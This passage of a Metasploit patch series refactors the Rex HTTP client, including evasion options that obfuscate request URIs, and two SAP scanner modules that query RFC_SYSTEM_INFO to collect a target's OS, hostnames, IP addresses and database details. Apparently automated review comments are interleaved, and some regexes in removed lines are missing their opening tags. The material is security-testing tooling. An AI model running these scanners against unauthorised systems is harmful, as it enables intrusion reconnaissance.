agent parameter was specified, but so was a header, prefer the header - if c_ag and c_head.keys.map{|x| x.downcase }.include?('user-agent') - c_ag = nil + if opts['basic_auth'] and not opts['authorization'] + opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) end - uri = set_uri(c_uri) - - req = '' - req << set_method(c_meth) - req << set_method_uri_spacer() - req << set_uri_prepend() - req << (c_enc ? set_encode_uri(uri) : uri) - - if (c_qs) - req << '?' - req << (c_enc ? 
set_encode_qs(c_qs) : c_qs) - end - - req << set_uri_append() - req << set_uri_version_spacer() - req << set_version(c_prot, c_vers) - req << set_host_header(c_host) - req << set_agent_header(c_ag) - - if (c_auth.length > 0) - unless c_head['Authorization'] and c_head['Authorization'].include? "Basic" - req << set_basic_auth_header(c_auth) - end - end - - req << set_cookie_header(c_cook) - req << set_connection_header(c_conn) - req << set_extra_headers(c_head) - req << set_raw_headers(c_rawh) - req << set_body(c_body) - - request = Request.new - request.parse(req) - request.options = opts - - request + req = ClientRequest.new(opts,self.config) end @@ -267,6 +230,10 @@ class Client opts['encode_params'] = false end + if opts['basic_auth'] and not opts['authorization'] + opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) + end + req = ClientRequest.new(opts,self.config) end @@ -322,7 +289,7 @@ class Client def send_recv(req, t = -1, persist=false) res = _send_recv(req,t,persist) if res and res.code == 401 and res.headers['WWW-Authenticate'] and have_creds? - res = send_auth(res, req.options, t, persist) + res = send_auth(res, req.opts, t, persist) end res end diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index cb76327f2b..c24d9a8c4a 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -2,6 +2,7 @@ require 'uri' require 'rex/proto/http' + module Rex module Proto module Http @@ -31,6 +32,8 @@ class ClientRequest attr_accessor :vars_post attr_accessor :version + attr_reader :opts + def initialize(opts={}, client_config) @cgi = opts['cgi'] @config = client_config @@ -53,6 +56,7 @@ class ClientRequest @vars_get = opts['vars_get'] @vars_post = opts['vars_post'] @version = opts['version'] + @opts = opts end def to_s 
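Review bot: `if opts['basic_auth'] and not opts['authorization']` is always true in its first operand because `opts['basic_auth']` was just defaulted to `''` a few lines earlier, so every request without credentials gets `opts['authorization'] = ""` (the base64 of an empty string) instead of no header; test `unless opts['basic_auth'].empty? or opts['authorization']`. The value stored is the bare base64 with no scheme, so once ClientRequest emits it the header would read `Authorization: <b64>` rather than `Authorization: Basic <b64>`; prefix `"Basic " +`. As far as the hunks of this commit show, ClientRequest#initialize still only adds `@opts = opts` and never copies `opts['authorization']` into `@authorization`, so the header is not actually emitted yet. The same block, with the same defects, is added to request_cgi in `@@ -267,6 +230,10 @@`. The deleted code also fell back to `self.hostname` when neither opts nor config supplied a vhost; `opts['vhost'] ||= config['vhost']` drops that fallback.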
@@ -156,13 +160,14 @@ class ClientRequest
 end
 def set_uri
+uri_str = uri
 if (config['uri_dir_self_reference'])
-uri.gsub!('/', '/./')
+uri_str.gsub!('/', '/./')
 end
 if (config['uri_dir_fake_relative'])
 buf = ""
-uri.split('/').each do |part|
+uri_str.split('/').each do |part|
 cnt = rand(8)+2
 1.upto(cnt) { |idx|
 buf << "/" + Rex::Text.rand_text_alphanumeric(rand(32)+1)
@@ -170,17 +175,17 @@ class ClientRequest
 buf << ("/.." * cnt)
 buf << "/" + part
 end
-uri = buf
+uri_str = buf
 end
 if (config['uri_full_url'])
 url = self.ssl ? "https" : "http"
 url << self.config['vhost']
 url << ((self.port == 80) ? "" : ":#{self.port}")
-url << uri
+url << uri_str
 url
 else
-uri
+uri_str
 end
 end
From 4170a85d8adb8384d467176dd7a1d935455205aa Mon Sep 17 00:00:00 2001
From: Chris John Riley
Date: Tue, 19 Feb 2013 09:42:13 +0100
Subject: [PATCH 021/139] Added logic to only report when value is present
---
 .../scanner/sap/sap_icf_rfc_system_info.rb | 38 +++++++++----------
 1 file changed, 19 insertions(+), 19 deletions(-)
diff --git a/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb
index dd47aaa5c7..602d270cb6 100644
--- a/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb
+++ b/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb
@@ -126,6 +126,7 @@ class Metasploit4 < Msf::Auxiliary
 # output table
 print(saptbl.to_s)
+# report notes
 report_note(
 :host => ip,
 :proto => 'tcp',
@@ -133,7 +134,7 @@ class Metasploit4 < Msf::Auxiliary
 :sname => 'sap',
 :type => 'sap.version.release',
 :data => "Release Status of SAP System: #{rfcsaprl}"
-)
+) if not rfcsaprl.empty?
 report_note(
 :host => ip,
@@ -142,7 +143,7 @@ class Metasploit4 < Msf::Auxiliary
 :sname => 'sap',
 :type => 'sap.version.rfc_log',
 :data => "RFC Log Version: #{rfcproto}"
-)
+) if not rfcproto.empty?
 report_note(
 :host => ip,
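Review bot: `uri_str = uri` only renames the reference; `uri_str.gsub!('/', '/./')` still edits the String held in `@uri` (and in the caller's `opts['uri']`) in place, so the self-reference padding accumulates each time `to_s` is called on the same request. `uri_str = uri.dup` (or a non-bang `gsub`) is what the rename was after; `set_cgi` has the same `uri_str.gsub!` pattern and is not touched by this commit.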
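Review bot: The `uri_full_url` branch kept here calls `self.ssl`, which ClientRequest does not define in the version on this page (it has no `ssl` accessor and receives only `opts` and `client_config`), so enabling that option raises NoMethodError; the flag would have to be passed in from Client the way `port` is. The same lines build `"https"`/`"http"` followed immediately by the vhost with no `://` separator, a defect carried over from the deleted Client#set_uri.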
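Review bot: `) if not rfcsaprl.empty?` — Ruby style prefers `unless rfcsaprl.empty?` over `if not ...`, and the same modifier is repeated on every remaining hunk of this file and again in sap_soap_rfc_system_info.rb in the following commit. If any of these values can be nil rather than "" when the response lacks the field (their extraction is outside the hunk), `.empty?` raises NoMethodError and the whole report aborts; `unless rfcsaprl.to_s.empty?` handles both cases.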
@@ -151,7 +152,7 @@ class Metasploit4 < Msf::Auxiliary :sname => 'sap', :type => 'sap.version.kernel', :data => "Kernel Release: #{rfckernrl}" - ) + ) if not rfckernrl.empty? report_note( :host => ip, @@ -160,7 +161,7 @@ class Metasploit4 < Msf::Auxiliary :sname => 'sap', :type => 'system.os', :data => "Operating System: #{rfcopsys}" - ) + ) if not rfcopsys.empty? report_note( :host => ip, @@ -168,7 +169,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'sap.db.hostname', :data => "Database Host: #{rfcdbhost}" - ) + ) if not rfcdbhost.empty? report_note( :host => ip, @@ -176,9 +177,9 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'sap.db_system', :data => "Central Database System: #{rfcdbsys}" - ) + ) if not rfcdbsys.empty? - if rfcinttyp == 'LIT' + if rfcinttyp == 'LIT' report_note( :host => ip, :proto => 'tcp', @@ -186,7 +187,7 @@ class Metasploit4 < Msf::Auxiliary :type => 'system.endianness', :data => "Integer Format: Little Endian" ) - else + elsif not rfcinttyp.empty? report_note( :host => ip, :proto => 'tcp', @@ -202,7 +203,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'system.hostname', :data => "Hostname: #{rfchost}" - ) + ) if not rfchost.empty? if rfcflotyp == 'IE3' report_note( @@ -212,7 +213,7 @@ class Metasploit4 < Msf::Auxiliary :type => 'system.float_type', :data => "Float Type Format: IEEE" ) - else + elsif not rfcflotyp.empty? report_note( :host => ip, :proto => 'tcp', @@ -228,7 +229,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'system.ip.v4', :data => "IPv4 Address: #{rfcipaddr}" - ) + ) if not rfcipaddr.empty? report_note( :host => ip, @@ -236,7 +237,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'system.ip.v6', :data => "IPv6 Address: #{rfcipv6addr}" - ) + ) if not rfcipv6addr.empty? report_note( :host => ip, 
@@ -244,7 +245,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'sap.instance', :data => "System ID: #{rfcsysid}" - ) + ) if not rfcsysid.empty? report_note( :host => ip, @@ -252,7 +253,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'sap.rfc.destination', :data => "RFC Destination: #{rfcdest}" - ) + ) if not rfcdest.empty? report_note( :host => ip, @@ -260,7 +261,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'system.timezone', :data => "Timezone: #{rfctzone.gsub(/\s+/, "")} (diff from UTC in seconds)" - ) + ) if not rfctzone.empty? report_note( :host => ip, @@ -268,7 +269,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'system.charset', :data => "Character Set: #{rfcchartyp}" - ) + ) if not rfcchartyp.empty? report_note( :host => ip, @@ -276,8 +277,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'sap.daylight_saving_time', :data => "Daylight Saving Time: #{rfcdayst}" - ) - + ) if not rfcdayst.empty? report_note( :host => ip, @@ -285,6 +285,6 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'sap.machine_id', :data => "Machine ID: #{rfcmach.gsub(/\s+/, "")}" - ) + ) if not rfcmach.empty? end end \ No newline at end of file From d4011227e3cc98e2efec5d462be815451cbd1753 Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Tue, 19 Feb 2013 09:43:36 +0100 Subject: [PATCH 022/139] Made suitable changes to original module also (only report on non empty response) --- .../scanner/sap/sap_soap_rfc_system_info.rb | 39 ++++++++++--------- 1 file changed, 20 insertions(+), 19 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb index 80c4168c0f..7676ad2611 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb 
@@ -145,8 +145,10 @@ class Metasploit4 < Msf::Auxiliary saptbl << [ "Character Set", rfcchartyp ] saptbl << [ "Daylight Saving Time", rfcdayst ] saptbl << [ "Machine ID", rfcmach.gsub(/\s+/, "")] + # output table print(saptbl.to_s) + # report notes report_note( :host => ip, :proto => 'tcp', @@ -154,7 +156,7 @@ class Metasploit4 < Msf::Auxiliary :sname => 'sap', :type => 'sap.version.release', :data => "Release Status of SAP System: #{rfcsaprl}" - ) + ) if not rfcsaprl.empty? report_note( :host => ip, @@ -163,7 +165,7 @@ class Metasploit4 < Msf::Auxiliary :sname => 'sap', :type => 'sap.version.rfc_log', :data => "RFC Log Version: #{rfcproto}" - ) + ) if not rfcproto.empty? report_note( :host => ip, @@ -172,7 +174,7 @@ class Metasploit4 < Msf::Auxiliary :sname => 'sap', :type => 'sap.version.kernel', :data => "Kernel Release: #{rfckernrl}" - ) + ) if not rfckernrl.empty? report_note( :host => ip, @@ -181,7 +183,7 @@ class Metasploit4 < Msf::Auxiliary :sname => 'sap', :type => 'system.os', :data => "Operating System: #{rfcopsys}" - ) + ) if not rfcopsys.empty? report_note( :host => ip, @@ -189,7 +191,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'sap.db.hostname', :data => "Database Host: #{rfcdbhost}" - ) + ) if not rfcdbhost.empty? report_note( :host => ip, @@ -197,9 +199,9 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'sap.db_system', :data => "Central Database System: #{rfcdbsys}" - ) + ) if not rfcdbsys.empty? - if rfcinttyp == 'LIT' + if rfcinttyp == 'LIT' report_note( :host => ip, :proto => 'tcp', @@ -207,7 +209,7 @@ class Metasploit4 < Msf::Auxiliary :type => 'system.endianness', :data => "Integer Format: Little Endian" ) - else + elsif not rfcinttyp.empty? report_note( :host => ip, :proto => 'tcp', @@ -223,7 +225,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'system.hostname', :data => "Hostname: #{rfchost}" - ) + ) if not rfchost.empty? if rfcflotyp == 'IE3' report_note( 
@@ -233,7 +235,7 @@ class Metasploit4 < Msf::Auxiliary :type => 'system.float_type', :data => "Float Type Format: IEEE" ) - else + elsif not rfcflotyp.empty? report_note( :host => ip, :proto => 'tcp', @@ -249,7 +251,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'system.ip.v4', :data => "IPv4 Address: #{rfcipaddr}" - ) + ) if not rfcipaddr.empty? report_note( :host => ip, @@ -257,7 +259,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'system.ip.v6', :data => "IPv6 Address: #{rfcipv6addr}" - ) + ) if not rfcipv6addr.empty? report_note( :host => ip, @@ -265,7 +267,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'sap.instance', :data => "System ID: #{rfcsysid}" - ) + ) if not rfcsysid.empty? report_note( :host => ip, @@ -273,7 +275,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'sap.rfc.destination', :data => "RFC Destination: #{rfcdest}" - ) + ) if not rfcdest.empty? report_note( :host => ip, @@ -281,7 +283,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'system.timezone', :data => "Timezone: #{rfctzone.gsub(/\s+/, "")} (diff from UTC in seconds)" - ) + ) if not rfctzone.empty? report_note( :host => ip, @@ -289,7 +291,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'system.charset', :data => "Character Set: #{rfcchartyp}" - ) + ) if not rfcchartyp.empty? report_note( :host => ip, @@ -297,8 +299,7 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'sap.daylight_saving_time', :data => "Daylight Saving Time: #{rfcdayst}" - ) - + ) if not rfcdayst.empty? report_note( :host => ip, @@ -306,6 +307,6 @@ class Metasploit4 < Msf::Auxiliary :port => rport, :type => 'sap.machine_id', :data => "Machine ID: #{rfcmach.gsub(/\s+/, "")}" - ) + ) if not rfcmach.empty? end end From a75bae927d59984fb6c980fbb634eb1ce825bd54 Mon Sep 17 00:00:00 2001 
From: Chris John Riley Date: Tue, 19 Feb 2013 11:12:12 +0100 Subject: [PATCH 023/139] Replaced report_note and table output with single function Added proposed extract data function (HDM) --- .../scanner/sap/sap_icf_rfc_system_info.rb | 269 +++++------------ .../scanner/sap/sap_soap_rfc_system_info.rb | 273 +++++------------- 2 files changed, 143 insertions(+), 399 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb index 602d270cb6..6679e13e44 100644 --- a/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb @@ -49,6 +49,27 @@ class Metasploit4 < Msf::Auxiliary ], self.class) end + def extract_field(data, elem) + if data =~ /<#{elem}>([^<]+)<\/#{elem}>/i + return $1 + end + nil + end + + def report_note_sap(type, data, value) + # create note + report_note( + :host => rhost, + :port => rport, + :proto => 'tcp', + :sname => 'sap', + :type => type, + :data => data + value + ) if data + # update saptbl for output + @saptbl << [ data, value ] + end + def run_host(ip) print_status("[SAP] #{ip}:#{rport} - Sending RFC_SYSTEM_INFO request to SAP Application Server") @@ -58,6 +79,9 @@ class Metasploit4 < Msf::Auxiliary if res and res.code != 200 print_error("[SAP] #{ip}:#{rport} - Server did not respond as expected") return + elsif not res + print_error("[SAP] #{ip}:#{rport} - Server did not respond") + return end rescue ::Rex::ConnectionError print_error("[SAP] #{ip}:#{rport} - Unable to connect") @@ -66,7 +90,8 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - Response received") - saptbl = Msf::Ui::Console::Table.new( + # create table for output + @saptbl = Msf::Ui::Console::Table.new( Msf::Ui::Console::Table::Style::Default, 'Header' => "[SAP] ICF RFC_SYSTEM_INFO", 'Prefix' => "\n", 
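Review bot: `report_note_sap`'s `) if data` guard tests the label argument, which every call site passes as a string literal, so it never suppresses anything; the argument that can be nil is `value`, and `data + value` would raise TypeError for it, so the guard should read `) if value` (the callers' own `if rfcX` modifiers make it dead code either way). `extract_field` interpolates `elem` into the regex unescaped and returns the raw element text without XML entity decoding, so a value containing `&amp;` is reported verbatim; `Regexp.escape(elem)` is free, and `CGI.unescapeHTML` on the captured text would decode it. The note's `:host` changed from the `ip` handed to `run_host` to `rhost`, which is presumably the current scanner target, but passing `ip` through to the helper keeps the attribution tied to the host that actually answered. The same two helpers are duplicated verbatim in the SOAP module hunk ending on L86, so these points apply there as well.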
@@ -76,215 +101,59 @@ class Metasploit4 < Msf::Auxiliary "Key", "Value" ]) + response = res.body - rfcproto = $1 if response =~ /(.*)<\/RFCPROTO>/i - rfcchartyp = $1 if response =~ /(.*)<\/RFCCHARTYP>/i - rfcinttyp = $1 if response =~ /(.*)<\/RFCINTTYP>/i - rfcflotyp = $1 if response =~ /(.*)<\/RFCFLOTYP>/i - rfcdest = $1 if response =~ /(.*)<\/RFCDEST>/i - rfchost = $1 if response =~ /(.*)<\/RFCHOST>/i - rfcsysid = $1 if response =~ /(.*)<\/RFCSYSID>/i - rfcdbhost = $1 if response =~ /(.*)<\/RFCDBHOST>/i - rfcdbsys = $1 if response =~ /(.*)<\/RFCDBSYS>/i - rfcsaprl = $1 if response =~ /(.*)<\/RFCSAPRL>/i - rfcmach = $1 if response =~ /(.*)<\/RFCMACH>/i - rfcopsys = $1 if response =~ /(.*)<\/RFCOPSYS>/i - rfctzone = $1 if response =~ /(.*)<\/RFCTZONE>/i - rfcdayst = $1 if response =~ /(.*)<\/RFCDAYST>/i - rfcipaddr = $1 if response =~ /(.*)<\/RFCIPADDR>/i - rfckernrl = $1 if response =~ /(.*)<\/RFCKERNRL>/i - rfcipv6addr = $1 if response =~ /(.*)<\/RFCIPV6ADDR>/i - saptbl << [ "Release Status of SAP System", rfcsaprl ] - saptbl << [ "RFC Log Version", rfcproto ] - saptbl << [ "Kernel Release", rfckernrl ] - saptbl << [ "Operating System", rfcopsys ] - saptbl << [ "Database Host", rfcdbhost] - saptbl << [ "Central Database System", rfcdbsys ] + # extract data from response body + rfcproto = extract_field(response, 'rfcproto') + rfcchartyp = extract_field(response, 'rfcchartyp') + rfcinttyp = extract_field(response, 'rfcinttyp') + rfcflotyp = extract_field(response, 'rfcflotyp') + rfcdest = extract_field(response, 'rfcdest') + rfchost = extract_field(response, 'rfchost') + rfcsysid = extract_field(response, 'rfcsysid') + rfcdbhost = extract_field(response, 'rfcdbhost') + rfcdbsys = extract_field(response, 'rfcdbsys') + rfcsaprl = extract_field(response, 'rfcsaprl') + rfcmach = extract_field(response, 'rfcmach') + rfcopsys = extract_field(response, 'rfcopsys') + rfctzone = extract_field(response, 'rfctzone') + rfcdayst = extract_field(response, 'rfcdayst') + rfcipaddr 
= extract_field(response, 'rfcipaddr') + rfckernrl = extract_field(response, 'rfckernrl') + rfcipv6addr = extract_field(response, 'rfcipv6addr') - if rfcinttyp == 'LIT' - saptbl << [ "Integer Format", "Little Endian" ] - else - saptbl << [ "Integer Format", "Big Endian" ] - end - saptbl << [ "Hostname", rfchost ] - - if rfcflotyp == 'IE3' - saptbl << [ "Float Type Format", "IEEE" ] - else - saptbl << [ "Float Type Format", "IBM/370" ] - end - - saptbl << [ "IPv4 Address", rfcipaddr ] - saptbl << [ "IPv6 Address", rfcipv6addr ] - saptbl << [ "System ID", rfcsysid ] - saptbl << [ "RFC Destination", rfcdest ] - saptbl << [ "Timezone", "#{rfctzone.gsub(/\s+/, "")} (diff from UTC in seconds)" ] - saptbl << [ "Character Set", rfcchartyp ] - saptbl << [ "Daylight Saving Time", rfcdayst ] - saptbl << [ "Machine ID", rfcmach.gsub(/\s+/, "")] - # output table - print(saptbl.to_s) - - # report notes - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :sname => 'sap', - :type => 'sap.version.release', - :data => "Release Status of SAP System: #{rfcsaprl}" - ) if not rfcsaprl.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :sname => 'sap', - :type => 'sap.version.rfc_log', - :data => "RFC Log Version: #{rfcproto}" - ) if not rfcproto.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :sname => 'sap', - :type => 'sap.version.kernel', - :data => "Kernel Release: #{rfckernrl}" - ) if not rfckernrl.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :sname => 'sap', - :type => 'system.os', - :data => "Operating System: #{rfcopsys}" - ) if not rfcopsys.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'sap.db.hostname', - :data => "Database Host: #{rfcdbhost}" - ) if not rfcdbhost.empty? 
- - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'sap.db_system', - :data => "Central Database System: #{rfcdbsys}" - ) if not rfcdbsys.empty? + # report notes / create saptbl output + report_note_sap('sap.version.release','Release Status of SAP System: ',rfcsaprl) if rfcsaprl + report_note_sap('sap.version.rfc_log','RFC Log Version: ',rfcproto) if rfcproto + report_note_sap('sap.version.kernel','Kernel Release: ',rfckernrl) if rfckernrl + report_note_sap('system.os','Operating System: ',rfcopsys) if rfcopsys + report_note_sap('sap.db.hostname','Database Host: ',rfcdbhost) if rfcdbhost + report_note_sap('sap.db_system','Central Database System: ',rfcdbsys) if rfcdbsys + report_note_sap('system.hostname','Hostname: ',rfchost) if rfchost + report_note_sap('system.ip.v4','IPv4 Address: ',rfcipaddr) if rfcipaddr + report_note_sap('system.ip.v6','IPv6 Address: ',rfcipv6addr) if rfcipv6addr + report_note_sap('sap.instance','System ID: ',rfcsysid) if rfcsysid + report_note_sap('sap.rfc.destination','RFC Destination: ',rfcdest) if rfcdest + report_note_sap('system.timezone','Timezone (diff from UTC in seconds): ',rfctzone.gsub(/\s+/, "")) if rfctzone + report_note_sap('system.charset','Character Set: ',rfcchartyp) if rfcchartyp + report_note_sap('sap.daylight_saving_time','Daylight Saving Time: ',rfcdayst) if rfcdayst + report_note_sap('sap.machine_id','Machine ID: ',rfcmach.gsub(/\s+/,"")) if rfcmach if rfcinttyp == 'LIT' - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.endianness', - :data => "Integer Format: Little Endian" - ) - elsif not rfcinttyp.empty? 
- report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.endianness', - :data => "Integer Format: Big Endian" - ) + report_note_sap('system.endianness','Integer Format: ', 'Little Endian') + elsif rfcinttyp + report_note_sap('system.endianness','Integer Format: ', 'Big Endian') end - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.hostname', - :data => "Hostname: #{rfchost}" - ) if not rfchost.empty? - if rfcflotyp == 'IE3' - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.float_type', - :data => "Float Type Format: IEEE" - ) - elsif not rfcflotyp.empty? - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.float_type', - :data => "Float Type Format: IBM/370" - ) + report_note_sap('system.float_type','Float Type Format: ', 'IEEE') + elsif rfcflotyp + report_note_sap('system.float_type','Float Type Format: ', 'IBM/370') end - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.ip.v4', - :data => "IPv4 Address: #{rfcipaddr}" - ) if not rfcipaddr.empty? + # output table + print(@saptbl.to_s) - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.ip.v6', - :data => "IPv6 Address: #{rfcipv6addr}" - ) if not rfcipv6addr.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'sap.instance', - :data => "System ID: #{rfcsysid}" - ) if not rfcsysid.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'sap.rfc.destination', - :data => "RFC Destination: #{rfcdest}" - ) if not rfcdest.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.timezone', - :data => "Timezone: #{rfctzone.gsub(/\s+/, "")} (diff from UTC in seconds)" - ) if not rfctzone.empty? 
- - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.charset', - :data => "Character Set: #{rfcchartyp}" - ) if not rfcchartyp.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'sap.daylight_saving_time', - :data => "Daylight Saving Time: #{rfcdayst}" - ) if not rfcdayst.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'sap.machine_id', - :data => "Machine ID: #{rfcmach.gsub(/\s+/, "")}" - ) if not rfcmach.empty? end end \ No newline at end of file diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb index 7676ad2611..808695293b 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb @@ -53,6 +53,27 @@ class Metasploit4 < Msf::Auxiliary ], self.class) end + def extract_field(data, elem) + if data =~ /<#{elem}>([^<]+)<\/#{elem}>/i + return $1 + end + nil + end + + def report_note_sap(type, data, value) + # create note + report_note( + :host => rhost, + :port => rport, + :proto => 'tcp', + :sname => 'sap', + :type => type, + :data => data + value + ) if data + # update saptbl for output + @saptbl << [ data, value ] + end + def run_host(ip) client = datastore['CLIENT'] data = '' 
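Review bot: The table rows now reuse the note prefix as their label, so the output column reads `Hostname: ` with a trailing colon and space where the removed code printed `Hostname`; `report_note_sap` could strip it with `@saptbl << [ data.chomp(': '), value ]` or take the label as a separate argument. `@saptbl` is instance state that is filled and printed from `run_host`; if the scanner mixin ever runs `run_host` for several hosts on one shared instance, rows from different hosts would interleave, whereas a local table passed to the helper avoids the question entirely. The same structure is repeated in the SOAP module hunk that ends on L91. `run_host` begins outside this hunk.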
@@ -86,227 +107,81 @@ class Metasploit4 < Msf::Auxiliary # to do - implement error handlers for each status code, 404, 301, etc. print_error("[SAP] #{ip}:#{rport} - something went wrong!") return + elsif not res + print_error("[SAP] #{ip}:#{rport} - Server did not respond") + return end rescue ::Rex::ConnectionError print_error("[SAP] #{ip}:#{rport} - Unable to connect") return end - print_status("[SAP] #{ip}:#{rport} - got response") - saptbl = Msf::Ui::Console::Table.new( + + print_status("[SAP] #{ip}:#{rport} - Response received") + + # create table for output + @saptbl = Msf::Ui::Console::Table.new( Msf::Ui::Console::Table::Style::Default, - 'Header' => "[SAP] System Info", + 'Header' => "[SAP] ICF RFC_SYSTEM_INFO", 'Prefix' => "\n", 'Postfix' => "\n", 'Indent' => 1, 'Columns' =>[ - "Info", + "Key", "Value" ]) + response = res.body - rfcproto = $1 if response =~ /(.*)<\/RFCPROTO>/i - rfcchartyp = $1 if response =~ /(.*)<\/RFCCHARTYP>/i - rfcinttyp = $1 if response =~ /(.*)<\/RFCINTTYP>/i - rfcflotyp = $1 if response =~ /(.*)<\/RFCFLOTYP>/i - rfcdest = $1 if response =~ /(.*)<\/RFCDEST>/i - rfchost = $1 if response =~ /(.*)<\/RFCHOST>/i - rfcsysid = $1 if response =~ /(.*)<\/RFCSYSID>/i - rfcdbhost = $1 if response =~ /(.*)<\/RFCDBHOST>/i - rfcdbsys = $1 if response =~ /(.*)<\/RFCDBSYS>/i - rfcsaprl = $1 if response =~ /(.*)<\/RFCSAPRL>/i - rfcmach = $1 if response =~ /(.*)<\/RFCMACH>/i - rfcopsys = $1 if response =~ /(.*)<\/RFCOPSYS>/i - rfctzone = $1 if response =~ /(.*)<\/RFCTZONE>/i - rfcdayst = $1 if response =~ /(.*)<\/RFCDAYST>/i - rfcipaddr = $1 if response =~ /(.*)<\/RFCIPADDR>/i - rfckernrl = $1 if response =~ /(.*)<\/RFCKERNRL>/i - rfcipv6addr = $1 if response =~ /(.*)<\/RFCIPV6ADDR>/i - saptbl << [ "Release Status of SAP System", rfcsaprl ] - saptbl << [ "RFC Log Version", rfcproto ] - saptbl << [ "Kernel Release", rfckernrl ] - saptbl << [ "Operating System", rfcopsys ] - saptbl << [ "Database Host", rfcdbhost] - saptbl << [ "Central Database 
System", rfcdbsys ] - if rfcinttyp == 'LIT' - saptbl << [ "Integer Format", "Little Endian" ] - else - saptbl << [ "Integer Format", "Big Endian" ] - end - saptbl << [ "Hostname", rfchost ] - if rfcflotyp == 'IE3' - saptbl << [ "Float Type Format", "IEEE" ] - else - saptbl << [ "Float Type Format", "IBM/370" ] - end - saptbl << [ "IPv4 Address", rfcipaddr ] - saptbl << [ "IPv6 Address", rfcipv6addr ] - saptbl << [ "System ID", rfcsysid ] - saptbl << [ "RFC Destination", rfcdest ] - saptbl << [ "Timezone", "#{rfctzone.gsub(/\s+/, "")} (diff from UTC in seconds)" ] - saptbl << [ "Character Set", rfcchartyp ] - saptbl << [ "Daylight Saving Time", rfcdayst ] - saptbl << [ "Machine ID", rfcmach.gsub(/\s+/, "")] - # output table - print(saptbl.to_s) - # report notes - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :sname => 'sap', - :type => 'sap.version.release', - :data => "Release Status of SAP System: #{rfcsaprl}" - ) if not rfcsaprl.empty? + # extract data from response body + rfcproto = extract_field(response, 'rfcproto') + rfcchartyp = extract_field(response, 'rfcchartyp') + rfcinttyp = extract_field(response, 'rfcinttyp') + rfcflotyp = extract_field(response, 'rfcflotyp') + rfcdest = extract_field(response, 'rfcdest') + rfchost = extract_field(response, 'rfchost') + rfcsysid = extract_field(response, 'rfcsysid') + rfcdbhost = extract_field(response, 'rfcdbhost') + rfcdbsys = extract_field(response, 'rfcdbsys') + rfcsaprl = extract_field(response, 'rfcsaprl') + rfcmach = extract_field(response, 'rfcmach') + rfcopsys = extract_field(response, 'rfcopsys') + rfctzone = extract_field(response, 'rfctzone') + rfcdayst = extract_field(response, 'rfcdayst') + rfcipaddr = extract_field(response, 'rfcipaddr') + rfckernrl = extract_field(response, 'rfckernrl') + rfcipv6addr = extract_field(response, 